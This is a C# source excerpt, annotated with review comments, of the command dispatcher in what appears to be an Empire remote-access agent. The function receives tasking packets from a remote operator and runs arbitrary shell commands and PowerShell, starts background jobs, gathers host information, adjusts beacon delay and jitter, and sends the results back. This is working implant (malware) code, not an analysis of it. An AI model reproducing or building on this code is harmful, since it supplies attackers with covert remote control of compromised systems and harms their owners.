////////////////////////////////////////////////////////////////////////////////
//The hard part
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Dispatches one decoded tasking packet on its numeric <c>packet.type</c> and
/// returns the encoded reply packet. Every branch either returns a packet built
/// by <c>EncodePacket</c> or (type 2) terminates the process. Any exception
/// thrown by a handler is turned into a reply of the same type whose body is
/// the exception's full string form (message plus stack trace), so handler
/// failures are reported to the remote side rather than crashing the loop.
/// </summary>
/// <param name="packet">Decoded tasking packet; only <c>type</c>, <c>taskId</c> and <c>data</c> are read here.</param>
/// <returns>Encoded reply packet for <paramref name="packet"/>; never null.</returns>
private byte[] ProcessTasking(PACKET packet)
{
    // NOTE(review): never read — every path below returns directly; dead local.
    byte[] returnPacket = new byte[0];
    try
    {
        //Change this to a switch : case
        int type = packet.type;
        switch (type)
        {
            case 1:
                // Host inventory request: the two literal arguments are passed through to
                // EmpireStager.GetSystemInformation as-is (their meaning is defined there, not here)
                // and the result is ASCII-decoded before being echoed back as a type-1 reply.
                byte[] systemInformationBytes = EmpireStager.GetSystemInformation("0", "servername");
                string systemInformation = Encoding.ASCII.GetString(systemInformationBytes);
                return(EncodePacket(1, systemInformation, packet.taskId));
            case 2:
                // Exit: the notice is sent synchronously first, then the process is terminated.
                // Environment.Exit never returns, so the trailing return is unreachable.
                string message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting";
                SendMessage(EncodePacket(2, message, packet.taskId));
                Environment.Exit(0);
                //This is still dumb
                return(new byte[0]);
            case 40:
                // packet.data is tokenised on single spaces only (no quoting, runs of spaces
                // yield empty tokens). "Set-Delay" is handled locally; anything else is handed
                // to Agent.InvokeShellCommand as <command> <remaining tokens joined by ' '>.
                string[] parts = packet.data.Split(' ');
                string output;
                if (parts[0] == "Set-Delay")
                {
                    // NOTE(review): parts[1]/parts[2] are read without a length check and parsed
                    // with UInt32.Parse (culture-sensitive, throws on non-numeric input); a short or
                    // malformed command surfaces as the generic "Error running command" reply below.
                    // The Console line and the reply text are both missing a separator before the value.
                    Console.WriteLine("Current delay" + sessionInfo.GetDefaultDelay());
                    sessionInfo.SetDefaultDelay(UInt32.Parse(parts[1]));
                    sessionInfo.SetDefaultJitter(UInt32.Parse(parts[2]));
                    output = "Delay set to " + parts[1] + "Jitter set to " + parts[2];
                }
                else if (1 == parts.Length)
                {
                    output = Agent.InvokeShellCommand(parts.FirstOrDefault(), "");
                }
                else
                {
                    // Skip(1) already drops the command token; Take(parts.Length - 1) is a no-op here.
                    output = Agent.InvokeShellCommand(parts.FirstOrDefault(), string.Join(" ", parts.Skip(1).Take(parts.Length - 1).ToArray()));
                }
                byte[] packetBytes = EncodePacket(packet.type, output, packet.taskId);
                return(packetBytes);
            case 41:
                return(Task41(packet));
            case 42:
                return(Task42(packet));
            case 43:
                return(Task43(packet));
            case 44:
                return(Task44(packet));
            case 50:
                // Job listing: replies with the current keys of jobTracking.jobs (a snapshot copy).
                List <string> runningJobs = new List <string>(jobTracking.jobs.Keys);
                return(EncodePacket(packet.type, runningJobs.ToArray(), packet.taskId));
            case 51:
                return(Task51(packet));
            case 100:
                // packet.data is passed verbatim to Agent.RunPowerShell; its output becomes the reply body.
                return(EncodePacket(packet.type, Agent.RunPowerShell(packet.data), packet.taskId));
            case 101:
                return(Task101(packet));
            case 110:
                // Background job: StartAgentJob receives the raw data and the task id and returns an identifier.
                string jobId = jobTracking.StartAgentJob(packet.data, packet.taskId);
                return(EncodePacket(packet.type, "Job started: " + jobId, packet.taskId));
            case 111:
                // Placeholder reply; no handler exists for this type (note the misspelling is part of the wire text).
                return(EncodePacket(packet.type, "Not Implimented", packet.taskId));
            case 120:
                return(Task120(packet));
            case 121:
                return(Task121(packet));
            default:
                // Unknown type is answered with type 0 rather than echoing the request type.
                return(EncodePacket(0, "Invalid type: " + packet.type, packet.taskId));
        }
    }
    catch (Exception error)
    {
        // Concatenating the exception object invokes ToString(), so the reply carries the
        // exception type, message and stack trace, not just the message.
        return(EncodePacket(packet.type, "Error running command: " + error, packet.taskId));
    }
}